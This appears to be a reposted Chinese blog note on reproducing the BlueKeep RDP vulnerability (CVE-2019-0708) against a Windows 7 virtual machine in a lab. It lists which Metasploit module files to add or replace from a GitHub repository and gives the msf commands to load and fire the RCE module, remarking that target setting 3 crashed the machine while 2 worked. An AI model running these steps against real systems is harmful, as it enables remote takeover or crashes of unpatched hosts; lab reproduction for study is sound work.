cve-2019-0708 win7复现

2022年4月13日22:47:16评论54 views字数 670阅读2分14秒阅读模式

在vm中开启一台win7 x64 sp1

去https://github.com/NAXG/cve_2019_0708_bluekeep_rce 找到需要去msf添加和修改的内容

cve-2019-0708 win7复现

操作步骤如下

1.cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/

2.rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

3.rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

4.cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

打开msf，将模块重载

reload_all

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

cve-2019-0708 win7复现

1.设置目标ip
2.set taget 2

cve-2019-0708 win7复现

ps:

都说该设置成3，但是用一次3蓝屏一次，试了一次2居然就打到了，实践出真知。。。虽然不知道为啥。。。当然，2也蓝屏过。。。

原文始发于微信公众号（CTS纵横安全实验室）：cve-2019-0708 win7复现

PentestDB各种数据库的利用姿势